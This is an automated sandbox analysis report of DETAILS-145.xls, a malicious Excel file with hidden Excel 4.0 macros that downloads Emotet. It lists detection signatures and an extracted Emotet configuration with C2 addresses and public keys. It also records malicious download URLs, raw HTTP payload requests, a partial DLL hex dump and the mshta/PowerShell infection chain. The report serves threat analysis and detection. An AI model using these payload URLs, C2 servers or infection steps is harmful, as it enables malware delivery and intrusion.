Windows Analysis Report
DETAILS-145.xls

Overview

General Information

Sample Name: DETAILS-145.xls
Analysis ID: 562407
MD5: c15231bf03d2cde2f5d16665421d03a1
SHA1: e552fc97c08d64ac0d17c4cebf428665982600ed
SHA256: 107833427623de2638b3514e51ac1241be3911cccc699e8603c7146755356bd9
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://kuyporn.com/wp-content/XS Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlfunction Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/w Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlv1.0 Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3 Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-b Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3 Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.html~( Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/ Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/ Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/ Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/Yc Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.pngPE3 Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/ Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3 Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/g Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/ Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/ Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/ Avira URL Cloud: Label: malware
Source: http://kuyporn.com Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlNE Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/PE3 Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlB Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-con Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/PE3 Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.html&E Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmln Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.png Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmls Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlC: Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/ Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3 Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-inclu Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168 URL Reputation: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/PE3 Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/ Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlmshta Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3 Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin Avira URL Cloud: Label: malware
Found malware configuration
Source: 19.2.rundll32.exe.180000.0.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Multi AV Scanner detection for submitted file
Source: DETAILS-145.xls ReversingLabs: Detection: 34%
Machine Learning detection for dropped file
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: kuyporn.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 74.207.230.120:8080
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 37.59.209.141:8080
Source: Malware configuration extractor IPs: 116.124.128.206:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 203.153.216.46:443
Source: Malware configuration extractor IPs: 168.197.250.14:80
Source: Malware configuration extractor IPs: 207.148.81.119:8080
Source: Malware configuration extractor IPs: 195.154.146.35:443
Source: Malware configuration extractor IPs: 78.46.73.125:443
Source: Malware configuration extractor IPs: 191.252.103.16:80
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 185.168.130.138:443
Source: Malware configuration extractor IPs: 142.4.219.173:8080
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 159.69.237.188:443
Source: Malware configuration extractor IPs: 190.90.233.66:443
Source: Malware configuration extractor IPs: 104.131.62.48:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 185.148.168.15:8080
Source: Malware configuration extractor IPs: 54.38.242.185:443
Source: Malware configuration extractor IPs: 198.199.98.78:8080
Source: Malware configuration extractor IPs: 194.9.172.107:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 66.42.57.149:443
Source: Malware configuration extractor IPs: 185.148.168.220:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 128.199.192.135:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 59.148.253.194:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 557056Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 20:08:01 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 20:08:01 GMTContent-Disposition: attachment; filename="v3Q.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f44d2196a27=1643400481; expires=Fri, 28-Jan-2022 20:09:01 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 20:08:01 GMTX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View IP Address: 104.131.62.48 104.131.62.48
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 15
Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se
Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430722808.000000000032D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.451488221.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454957215.0000000002E41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454579949.0000000000345000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.html&E
Source: DETAILS-145.xls.0.dr String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlB
Source: mshta.exe, 00000004.00000002.454965047.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.452003548.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430447784.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.451488221.0000000002E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlC:
Source: mshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlNE
Source: mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlWinSta0
Source: mshta.exe, 00000004.00000003.432443506.00000000024AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlfunction
Source: mshta.exe, 00000004.00000003.431930961.00000000024A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlmshta
Source: mshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmln
Source: mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmls
Source: mshta.exe, 00000004.00000003.451477206.0000000002E41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454957215.0000000002E41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlv1.0
Source: mshta.exe, 00000004.00000002.454744998.00000000003E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.html~(
Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.692139905.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.png
Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.pngPE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/PE3
Source: powershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.c
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XS
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XSs5/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XSs5/PE3
Source: powershell.exe, 00000006.00000002.682272130.00000000002D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://piriform.comk
Source: rundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/Yc
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/PE3
Source: rundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000004.00000002.454946718.0000000002E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.comth4cM
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.c
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/g
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-con
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-b
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-inclu
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/w
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp
Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
